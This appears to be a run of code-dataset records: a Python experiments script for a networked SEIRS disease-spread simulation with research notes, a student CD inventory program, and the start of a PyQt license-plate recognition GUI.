{v.get_start_nodes()[0]}')\n plt.legend()\n plt.show()\n plt.savefig('betas vs ttp chicago start.png')\n\ndef test_multiple_beta_values(trials=10):\n v = VarGetter()\n \n # color_pairs = [('deeppink', 'lavenderblush'), ('blueviolet', 'lavender'), ('cyan', 'lightcyan'), ('chartreuse', 'honeydew'), ('grey', 'lightgrey'), ('red', 'lightcoral'), ('blue', 'lightblue'), ('green', 'lightgreen'), ('orange', 'navajowhite')]\n color_pairs = [('red', 'lightcoral'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('blue', 'lightblue'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('green', 'lightgreen')]\n beta_vals = np.around(np.linspace(.2, .5, 9), 2)\n\n idxmax = []\n maxvals = []\n city_to_eval = 'Chicago'\n\n plt.subplot(1, 3, 1)\n\n for colors, beta in zip(color_pairs, beta_vals):\n dark, light = colors\n v.dvars['beta'] = beta\n a, b, c, d, x, y, z = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color=light)\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color=dark, label=f'{beta}')\n\n idxmax.append(y[city_to_eval])\n maxvals.append(z[city_to_eval])\n\n plt.legend()\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Comparing Disease Spread with Different Betas\")\n\n plt.subplot(1, 3, 2)\n plt.scatter(beta_vals, idxmax, color='blue')\n plt.xlabel('Beta Value')\n plt.ylabel('Time to Peak (Days)')\n plt.title(f'Time to Peak vs Beta Value ({city_to_eval})')\n\n plt.subplot(1, 3, 3)\n plt.scatter(beta_vals, maxvals, color='blue')\n plt.xlabel('Beta Value')\n plt.ylabel('Max Percent of Population Infected')\n plt.title(f'Max Percent of Population Infected vs Beta Value ({city_to_eval})')\n\n plt.show()\n\ndef test_multiple_policies(trials=10):\n v = VarGetter()\n line_vars = []\n plt.subplot(1, 2, 1)\n v.dvars['quarantine_days'] = 0\n v.threshold = 1\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightgreen')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='green', label='No Restrictions')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 0\n 
v.threshold = .2\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightblue')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='blue', label='20% Travel Ban')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 5\n v.threshold = 1\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightgrey')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='grey', label='5 Day Quarantine')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 0\n v.threshold = 1\n v.beta = .2\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lavender')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='purple', label='.2 Beta')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 5\n v.threshold = .2\n v.beta = .2\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='mistyrose')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='red', label='All Policies')\n line_vars.append((a, b, c, d))\n\n plt.legend(loc='upper left')\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Comparing Max I Different Combinations Threhold, Quarantine and Beta\")\n\n plt.subplot(1, 2, 2)\n a, b, c, d = line_vars[0]\n no_policy = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[1]\n thresh = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[2]\n quar = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[3]\n beta = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[4]\n plt.plot(x, (thresh - no_policy) + (quar - no_policy) + (beta - no_policy), color='green', label='Implemented Individually')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d - no_policy, color='blue', label='Implemented Together')\n plt.legend(loc='upper left')\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Policies Implemented Individually versus Together\")\n plt.show()\n\ndef test_multiple_policies_single_node(trials=10, city_to_analyze='Chicago'):\n v = VarGetter()\n \n v.dvars['beta'] = .2\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='green', label='.2')\n\n v.dvars['beta'] = .3\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='blue', label='.3')\n\n v.dvars['beta'] = .4\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='purple', label='.4')\n\n v.dvars['beta'] = .5\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='red', label='.5')\n plt.legend()\n plt.xlabel('Time (Days)')\n plt.ylabel('Percent of Population Infected')\n plt.title(f'Comparing Different Betas on a Single Node ({city_to_analyze})')\n plt.show()\n\ndef get_avg_data(trials, v):\n avg_I_data = pd.DataFrame([])\n for i in tqdm(range(trials), desc=\"Trials\"):\n good = False\n while(not good):\n try:\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n good = True\n except KeyboardInterrupt as ki:\n print(\"Exiting\")\n exit()\n except:\n print(\"Invalid 
Run\")\n\n distance_from_start_order = np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]).argsort()\n city_list = np.array(list(tracker))[distance_from_start_order]\n I_populations = np.array([[i[2] / i[4] for i in np.array(city_stats)] for city_stats in tracker.values()])[distance_from_start_order]\n\n def logplusone(a):\n return np.log10(a+1)\n data = pd.DataFrame(I_populations, columns=time_tracker, index=city_list).apply(logplusone)\n\n if avg_I_data.empty:\n avg_I_data = data \n else:\n avg_I_data += data \n\n return avg_I_data.div(trials), time_tracker\n\ndef test_time_of_max_i(trials=10, show=True, v=VarGetter()):\n avg_I_data, time_tracker = get_avg_data(trials, v)\n\n distances = pd.DataFrame(np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]), columns=[\"Distances\"], index=np.array(v.get_cities())[:,0])\n populations = pd.DataFrame(v.get_cities(), columns=['Cities', 'Population']).set_index('Cities').apply(np.log)\n city_vals = pd.concat([distances, populations], axis=1).sort_values(by=\"Distances\")\n\n colors = [\"green\" if i == 'Columbus' else \"blue\" if i == 'Chicago' else \"red\" if i == 'Fargo' else \"orange\" if i == 'Wichita' else \"lightgrey\" for i in distances.index]\n\n WIDTH = 1\n SIGNAL = signal.morlet2\n\n a, b, c, d = np.polyfit(city_vals['Distances'], avg_I_data.idxmax(axis=1), 3)\n if(show):\n _, ax = plt.subplots(1, 3)\n ax[0].scatter(city_vals['Distances'], avg_I_data.idxmax(axis=1), color=colors)\n ax[0].plot(city_vals['Distances'], a * pow(city_vals['Distances'], 3) + b * pow(city_vals['Distances'], 2) + c * city_vals['Distances'] + d)\n ax[0].set_title(\"Max I Value\")\n ax[0].set_ylabel(\"Time in Days\")\n ax[0].set_xlabel(f\"Distances from {v.get_start_nodes()[0]}\")\n\n ax[1].scatter(city_vals['Population'], avg_I_data.idxmax(axis=1), color=colors)\n ax[1].set_title(\"Max I Value\")\n ax[1].set_ylabel(\"Time in Days\")\n ax[1].set_xlabel(f\"Population\")\n\n # max_wavelet = []\n # for i in avg_I_data.index:\n # max_wavelet.append(np.argmax(abs(signal.cwt(avg_I_data.loc[i], SIGNAL, [1]))) * get_time_vars()['time_step'])\n\n # ax[1].scatter(distances, max_wavelet, color=colors)\n # ax[1].set_title(\"Max value of wavelet transform\")\n\n for i in avg_I_data.index:\n color = 'lightgray'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color)\n\n for i in ['Fargo', 'Columbus', 'Chicago', 'Wichita']:\n if i == 'Fargo':\n color = 'r'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n elif i == 'Columbus':\n color = 'g'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n elif i == 'Chicago':\n color = 'b'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n elif i == 'Wichita':\n color = 'orange'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n else:\n pass\n\n ax[2].set_title(\"Morlet Wavelet Transform of Width 1 For All Cities\")\n ax[2].set_ylabel(\"Incidence with Morlet\")\n ax[2].set_xlabel(\"Time in Days\")\n plt.legend(loc='upper right')\n plt.show()\n\n return (a, b, c, d, city_vals['Distances'], avg_I_data.idxmax(axis=1), avg_I_data.max(axis=1))\n\ndef 
test_i_over_time_wavelets(trials=10, v=VarGetter()):\n avg_I_data, time_tracker = get_avg_data(trials, v)\n widths = np.arange(1, 31)\n # ['daub', 'qmf', 'cascade', 'morlet', 'ricker', 'cwt']\n\n WIDTH = 1\n SIGNAL = signal.morlet2\n\n # _, ax = plt.subplots(1, 3)\n for i in avg_I_data.index:\n color = 'lightgray'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n\n for i in avg_I_data.index:\n if i == 'Fargo':\n color = 'r'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Fargo')\n elif i == 'Columbus':\n color = 'g'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Columbus')\n elif i == 'Chicago':\n color = 'b'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, widths)\n # ax[2].plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color)\n plt.plot(time_tracker, abs(cwtmatr[WIDTH - 1]), color, label='Chicago')\n else:\n pass\n\n # cwtmatr = signal.cwt(avg_I_data.iloc[0], SIGNAL, widths)\n # for width in cwtmatr[1:]:\n # ax[1].plot(time_tracker, width)\n\n # ax[1].plot(SIGNAL(M=100, s=WIDTH))\n\n # ax[1].plot(time_tracker, cwtmatr[-1])\n # sns.heatmap(np.flipud(abs(cwtmatr)), ax=ax[0], xticklabels=int(len(time_tracker)/15))\n # sns.heatmap(fft.dct(avg_I_data.values)[:,:20], ax=ax[2], xticklabels=int(len(time_tracker)/15))\n # sns.heatmap(avg_I_data, ax=ax[1], xticklabels=int(len(time_tracker)/15))\n # ax[2].set_title(f\"All wavelet transforms of width {WIDTH}\")\n plt.title(f\"Wavelet Transform of Infected Individuals With .75 Spike\")\n plt.ylabel(\"Incidence with Morlet\")\n plt.xlabel(\"Time in Days\")\n plt.legend()\n # ax[1].set_title(f\"Infected Population Over Time For {avg_I_data.index[0]}\")\n # ax[2].set_title(f\"Visualization of Morlet2 for width {WIDTH}\")\n # txt=f\"Percent of population infected over time with y axis arranged by distance from {v.get_start_nodes()[0]}. The time period is {v.get_time_vars()['total_time']} days. 
The travel model used is {v.get_travel_vars()['connection_type']}.\"\n # plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n plt.show()\n\ndef test_total_i_over_time(trials=10):\n v = VarGetter() # bare get_*() helpers don't exist at module level; use a VarGetter instance like the other tests\n avg_populations = pd.DataFrame([])\n for i in tqdm(range(trials), desc=\"Trials\"):\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n populations = pd.DataFrame(tracker[list(tracker)[0]])\n for city in list(tracker)[1:]:\n populations += pd.DataFrame(tracker[city])\n\n if avg_populations.empty:\n avg_populations = populations \n else:\n avg_populations += populations\n\n S = plt.plot(time_tracker, avg_populations.iloc[:,0], 'r')\n E = plt.plot(time_tracker, avg_populations.iloc[:,1], 'y')\n I = plt.plot(time_tracker, avg_populations.iloc[:,2], 'b')\n R = plt.plot(time_tracker, avg_populations.iloc[:,3], 'g')\n cS = plt.plot(time_tracker, avg_populations.iloc[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title('Total Populations over Time Starting in Joliet')\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_i_over_time(trials=10):\n v = VarGetter()\n avg_I_data = pd.DataFrame([])\n infected_times = defaultdict(lambda: 0)\n for i in tqdm(range(trials), desc=\"Trials\"):\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n\n distance_from_start_order = np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]).argsort()\n city_list = np.array(list(tracker))[distance_from_start_order]\n I_populations = np.array([[i[2] / i[4] for i in np.array(city_stats)] for city_stats in tracker.values()])[distance_from_start_order]\n\n def logplusone(a):\n return np.log10(a+1)\n # .apply(logplusone)\n data = pd.DataFrame(I_populations, columns=time_tracker, index=city_list)\n\n if avg_I_data.empty:\n avg_I_data = data \n else:\n avg_I_data += data \n\n for city in data.index:\n start = 0\n end = 0\n for time, percent_pop in data.loc[city].iteritems():\n if start == 0 and percent_pop > .01:\n start = time \n \n if start > 0 and percent_pop < .01:\n end = time \n break \n \n if end == 0:\n end = 200\n\n infected_times[city] += end - start \n\n infected_times = dict((city, total_times / trials) for city, total_times in infected_times.items())\n avg_I_data = avg_I_data.div(trials)\n _, ax = plt.subplots(1, 3)\n sns.heatmap(avg_I_data, ax=ax[0], xticklabels=int(len(time_tracker)/15))\n ax[0].set_title(\"Infected Population Over Time\")\n txt=f\"Percent of population infected over time with y axis arranged by distance from {v.get_start_nodes()[0]}. The time period is {v.get_time_vars()['total_time']} days. 
The travel model used is {v.get_travel_vars()['connection_type']}.\"\n for i in avg_I_data.index:\n color = \"green\" if i == 'Columbus' else \"blue\" if i == 'Chicago' else \"red\" if i == 'Fargo' else \"orange\" if i == 'Wichita' else \"lightgrey\"\n ax[2].plot(time_tracker, avg_I_data.loc[i], color=color)\n plt.figtext(0.5, 0.01, txt, wrap=True, horizontalalignment='center', fontsize=12)\n sns.barplot(x=list(infected_times.keys()), y=list(infected_times.values()), ax=ax[1])\n plt.setp(ax[1].get_xticklabels(), rotation=30, horizontalalignment='right', fontsize='x-small')\n plt.show()\n\ndef test_network(trials=10): \n v = VarGetter()\n\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n\n tracker, _, time_tracker, _ = net.simulate()\n cities = ['Chicago', 'Milwaukee', 'Rockford', 'Gary', 'St. Louis', 'Columbus', 'Independence', 'Olathe']\n\n for city, number in zip(cities, range(1, len(cities) + 1)):\n populations = np.array(tracker[city])\n plt.subplot(1,len(cities),number)\n _ = plt.plot(time_tracker, populations[:,0], 'r')\n _ = plt.plot(time_tracker, populations[:,1], 'y')\n _ = plt.plot(time_tracker, populations[:,2], 'b')\n _ = plt.plot(time_tracker, populations[:,3], 'g')\n _ = plt.plot(time_tracker, populations[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title(city)\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_four_nodes(trials = 10):\n v = VarGetter()\n\n net = DiseaseNetwork(v.get_cities_small(), v.get_distances_small(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n\n tracker, _, time_tracker, _ = net.simulate()\n cities = np.array(v.get_cities_small())[:, 0]\n\n for city, number in zip(cities, range(1, len(cities) + 1)):\n populations = np.array(tracker[city])\n plt.subplot(1,len(cities),number)\n _ = plt.plot(time_tracker, populations[:,0], 'r')\n _ = plt.plot(time_tracker, populations[:,1], 'y')\n _ = plt.plot(time_tracker, populations[:,2], 'b')\n _ = plt.plot(time_tracker, populations[:,3], 'g')\n _ = plt.plot(time_tracker, populations[:,4], 'g--')\n plt.xlabel('Time')\n plt.ylabel('Disease Populations')\n plt.title(city)\n plt.legend(['S Population', 'E Population', 'I Population', 'R Population', 'Total Population'], loc='upper right')\n \n plt.show()\n\ndef test_single_node(trials = 100):\n v = VarGetter()\n delta_t = v.get_time_vars()['time_step']\n total_t = v.get_time_vars()['total_time']\n de_node = SEIRSDENode(2500000, v.get_dvars(), delta_t = delta_t, name = 'Chicago', start_with_disease=True)\n \n curr_time = 0\n time_tracker = []\n de_tracker = []\n\n for _ in tqdm(range(int(total_t / delta_t)), desc=\"Simulation\"):\n curr_time += delta_t\n de_node.increment()\n de_tracker.append(de_node.get_state())\n time_tracker.append(curr_time)\n\n st_tracker = np.array([])\n for _ in tqdm(range(trials), desc=\"Trial\"):\n st_node = SEIRSNode(2500000, v.get_dvars(), delta_t = delta_t, name = 'Chicago', start_with_disease=True)\n temp = []\n for _ in tqdm(range(int(total_t / delta_t)), desc=\"Simulation\"):\n st_node.increment()\n temp.append(st_node.get_state())\n\n temp = np.array(temp)\n\n if len(st_tracker) > 0:\n st_tracker += temp \n else:\n st_tracker = temp\n \n st_tracker = st_tracker / trials\n _, ax = plt.subplots(1, 2)\n st_tracker = np.array(st_tracker)\n ax[0].plot(time_tracker, st_tracker[:,0], 'r', label='S')\n 
ax[0].plot(time_tracker, st_tracker[:,1], 'y', label='E')\n ax[0].plot(time_tracker, st_tracker[:,2], 'b', label='I')\n ax[0].plot(time_tracker, st_tracker[:,3], 'g', label='R')\n ax[0].plot(time_tracker, st_tracker[:,4], 'g--')\n ax[0].set_xlabel('Time (Days)')\n ax[0].set_ylabel('Populations')\n ax[0].set_title('Population Makeup In Chicago Stochastic')\n\n de_tracker = np.array(de_tracker)\n ax[1].plot(time_tracker, de_tracker[:,0], 'r', label='S')\n ax[1].plot(time_tracker, de_tracker[:,1], 'y', label='E')\n ax[1].plot(time_tracker, de_tracker[:,2], 'b', label='I')\n ax[1].plot(time_tracker, de_tracker[:,3], 'g', label='R')\n ax[1].plot(time_tracker, de_tracker[:,4], 'g--')\n ax[1].set_xlabel('Time (Days)')\n ax[1].set_ylabel('Populations')\n ax[1].set_title('Population Makeup In Chicago Deterministic') \n\n ax[0].legend(loc='upper right')\n ax[1].legend(loc='upper right')\n plt.show()\n\n\"\"\"\nThink about questions to ask\nRead two travel papers\nThink about how to graph data so that my question is answered (peak(I), cumulative(I))\nStart tracking cumulative I (total number of people infected, new ones at each step)\nparameter that is varying, propbability of extinction (of disease)\ncumulative death\n\nTime to spikes or inbetween spikes\nThink about the ocsillations\nMax oscillation, min oscillation, time inbetween\n\nDistance from Chicago vs max_I, total_I\n\nThink about asymptotic behavior of the model, can we change it (super powerful)\n\nPlay around to see rough observations, start making some observations, how can we compare things\n- Three indicator cities\n- Travel ban cities\n- What else can we change in the model\n - Types of travel\n - Quarantine\n - Thresholding\n - Immunity loss\n - Testing Variables\n\nthink about how to quantify quarantine vs travel ban, surface plot of travel ban vs quarantine days\nthink about how the sin_beta function works, how does first case occurrence affect spread\n\nmake note of what simulations are most interesting\n\nupdate stochastic equations to discrete form, say S_{t + 1} - S_t\nintroduce why disease modelling is important\nintroduce graph setup, say where everything comes from, why decisions are made\n- this is just an example of how the model can be used, can be extracted to other nodes\n\nconfirm radiation is working\n\nmaybe:\n- try modelling nodes with different travel variables, different quarantine bans\n- random number that can be associated with compliance for each city\n- subtract random number of days from the quarantine, also for threshold\n\nrun the diff betas in chicago with a spike value, longer t final\n\"\"\"\n","repo_name":"NathanHu725/thesis","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":25274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11029011739","text":"#------------------------------------------#\r\n# Title: CDInventory.py\r\n# Desc: Starter Script for Assignment 05\r\n# Change Log: (Who, When, What)\r\n# DBiesinger, 2030-Jan-01, Created File\r\n# MList, 2020-Feb-23, Modified File by replacing inner lists with dictiionaries\r\n# MList, 2020-Feb-24 Added delete functionality\r\n# Mlist, 2020-Feb-24 Made file loading mandatory to prevent duplicates\r\n# Mlist, 2020-Feb-24 Added error message in case deleted CD does not exist\r\n# Mlist, 2020-Feb-24 Cleaning up code and adding comments\r\n# Mlist, 2020-Feb-24 Improving SoC\r\n#------------------------------------------#\r\n\r\n#---------- DATA 
----------#\r\n\r\n# Declare variables\r\nstrChoice = '' # User input\r\nlstTbl = [] # list of dictionaries to hold data\r\nlstRow = [] # Row list variable for storing text file information while reading\r\ndicRow = {} # dictionary of data row\r\nstrFileName = 'CDInventory.txt' # data storage file\r\nobjFile = None # file object\r\nFlag = True # flag to identify no found match for delete functionality\r\n\r\n#---------- PROCESSING ----------#\r\n\r\n# Attempting to load the current inventory upon startup. Loading inventory from an existing CDInventory.txt file has been made non-optional to avoid writing duplicates when deleting/saving edits with append\r\ntry:\r\n with open(strFileName, 'r') as objFile:\r\n for line in objFile:\r\n lstRow = line.strip().split(',')\r\n dicRow = {'ID': int(lstRow[0]), 'CD Title': lstRow[1], 'Artist': lstRow[2]}\r\n lstTbl.append(dicRow)\r\n print('\\nGood news! There is already a CDInventory.txt file. \\nThe existing file has been loaded and any saved changes will overwrite the existing file.')\r\nexcept IOError: \r\n print('\\nThere is currently no existing inventory file - A new Inventory File will be created when saving.\\n')\r\n\r\n#---------- PRESENTATION (Input/Output) (I/O) ----------#\r\n\r\nprint('\\nThe Magic CD Inventory\\n')\r\nwhile True:\r\n # 1. Display menu allowing the user to choose:\r\n print('\\n[a] Add CD\\n[i] Display Current Inventory')\r\n print('[d] delete CD from Inventory\\n[s] Save Inventory to file\\n[x] exit')\r\n strChoice = input('a, i, d, s or x: ').lower() # convert choice to lower case at time of input\r\n print()\r\n\r\n# Exit the program if the user chooses so\r\n if strChoice == 'x':\r\n break\r\n\r\n# Add data to the table (2d-list) each time the user wants to add data\r\n elif strChoice == 'a': # elif is not strictly necessary, as this code is only reached if strChoice is not 'x'\r\n # Ask for CD input\r\n strID = input('Enter an ID: ')\r\n strTitle = input('Enter the CD\\'s Title: ')\r\n strArtist = input('Enter the Artist\\'s Name: ')\r\n intID = int(strID)\r\n # casting input into dictionary\r\n dicRow = {'ID': intID, 'CD Title': strTitle, 'Artist': strArtist}\r\n lstTbl.append(dicRow)\r\n # Display the current data to the user each time the user wants to display the data\r\n elif strChoice == 'i':\r\n print('ID, CD Title, Artist')\r\n for row_dic in lstTbl:\r\n row_dic_values = row_dic.values()\r\n print(*row_dic_values, sep = ', ')\r\n\r\n # Delete functionality\r\n elif strChoice == 'd':\r\n # Ask for the entry to delete. This needs to be the value of the album title, because artist is not a unique identifier and there could be duplicate IDs.\r\n CD = input('Which CD would you like to delete?: ')\r\n # Counter starting at 0 for cycling through the individual dictionaries. Needs to be reset to 0 in case the user already used the delete functionality\r\n counter = 0\r\n # Defining a flag as False so an error message can be printed if no match is identified\r\n Flag = False\r\n # For each dictionary row in the 2D list\r\n for row in lstTbl:\r\n # Assigning values of the dictionary row to a variable\r\n row_values = row.values()\r\n # Checking if the input matches any values of the dictionary row\r\n if CD in row_values:\r\n # If a match has been identified, use the counter variable as the index location for deletion from the 2D list\r\n del lstTbl[counter]\r\n print ('The requested CD has been deleted. 
Do not forget to save your changes!')\r\n # Setting Flag to true so error message does not get printed\r\n Flag = True\r\n break\r\n else:\r\n # If the input does not match the values of the dictionary row increase the counter by 1 and move to the next dictionary row in the 2D list\r\n counter += 1\r\n # If no match has been found and deleted the flag will still be False and an error message will be printed\r\n if Flag is False:\r\n print ('The requested CD does not exist in the inventory txt file')\r\n\r\n # Save the data to a text file CDInventory.txt if the user chooses so\r\n elif strChoice == 's':\r\n write_string = ''\r\n for row_dic in lstTbl:\r\n row_dic_values = row_dic.values()\r\n for item in row_dic_values:\r\n write_string += str(item) + ','\r\n write_string = write_string [:-1] + '\\n'\r\n objFile = open(strFileName, 'w')\r\n objFile.write(write_string)\r\n objFile.close()\r\n else:\r\n print('Please choose either a, i, d, s or x!')\r\n\r\n","repo_name":"List-Michael/Assignment_05","sub_path":"CDInventory.py","file_name":"CDInventory.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27315059751","text":"# -*- coding: utf-8 -*-\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QMainWindow,QSplashScreen\nfrom Ui_MainWindow import Ui_MainWindow\nfrom PyQt5 import QtWidgets,QtCore\nfrom Ui_ImageWindow import Ui_Dialog\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtWidgets import QFileDialog, QTableWidgetItem ,QMessageBox\nfrom PyQt5.QtGui import QPixmap\nfrom plate import recognize_and_show_one_image\nfrom plate_video import video\nimport os\nfrom Ui_VideoWindow import Ui_Dialog2\n\nclass VideoWindow(QDialog, Ui_Dialog2):\n\n def __init__(self, parent=None):\n super(VideoWindow, self).__init__(parent)\n self.setupUi(self)\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n print('选择文件')\n fileName1, filetype = QFileDialog.getOpenFileName(self, \"选取文件\", \"C:/\",\n \"Text Flies(*.mp4);;Text Files (*.avi);;Text Files (*.mov)\"\n \";;Text Files (*.mpeg)\")\n self.lineEdit.setText(fileName1)\n\n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n path = self.lineEdit.text()\n if path == \"\" or path == \" \":\n QMessageBox.warning(self,'Warning','请选择文件!')\n else:\n # print(path)\n self.textBrowser.setText(\"\")\n self.textBrowser.append(\"正在处理,请稍候........\")\n file_name = video(path)\n self.textBrowser.append(\"处理完成!文件保存为:%s\"%(file_name))\n\nclass Image(QDialog, Ui_Dialog):\n\n def __init__(self, parent=None):\n\n super(Image, self).__init__(parent)\n self.setupUi(self)\n self.radio_flag =0\n self.pic = 1\n self.flag = 0\n self.path = ''\n @pyqtSlot()\n def on_radioButton_clicked(self):\n\n self.radio_flag = 0\n self.lineEdit.setText(\"\")\n \n @pyqtSlot()\n def on_radioButton_2_clicked(self):\n \"\"\"\n Slot documentation goes here\n \"\"\"\n self.radio_flag = 1\n self.lineEdit.setText(\"\")\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n # print(self.radio_flag)\n if self.radio_flag ==1:\n directory1 = QFileDialog.getExistingDirectory(self, \"选取文件夹\", \"C:/\")\n self.lineEdit.setText(directory1)\n else:\n #设置文件扩展名过滤,注意用双分号间隔 \n fileName1, filetype = QFileDialog.getOpenFileName(self, \"选取文件\", \"C:/\", \"Text Flies(*.jpg);;Text Files (*.png);;Text Files (*.jpeg)\")\n self.lineEdit.setText(fileName1)\n \n @pyqtSlot()\n def on_pushButton_2_clicked(self):\n\n self.flag = 1\n print('识别开始!')\n path = 
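# The delete branch of CDInventory.py above tracks a manual counter and a
# Flag variable to report misses; an equivalent, less error-prone Python
# pattern is enumerate() with a for/else clause. A sketch against a
# hypothetical table of the same row shape:
def delete_cd(table, title):
    for index, row in enumerate(table):
        if title in row.values():
            del table[index]
            print('The requested CD has been deleted. Do not forget to save your changes!')
            break
    else:  # the loop finished without a break, so nothing matched
        print('The requested CD does not exist in the inventory txt file')

inventory = [{'ID': 1, 'CD Title': 'Abbey Road', 'Artist': 'The Beatles'}]
delete_cd(inventory, 'Abbey Road')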
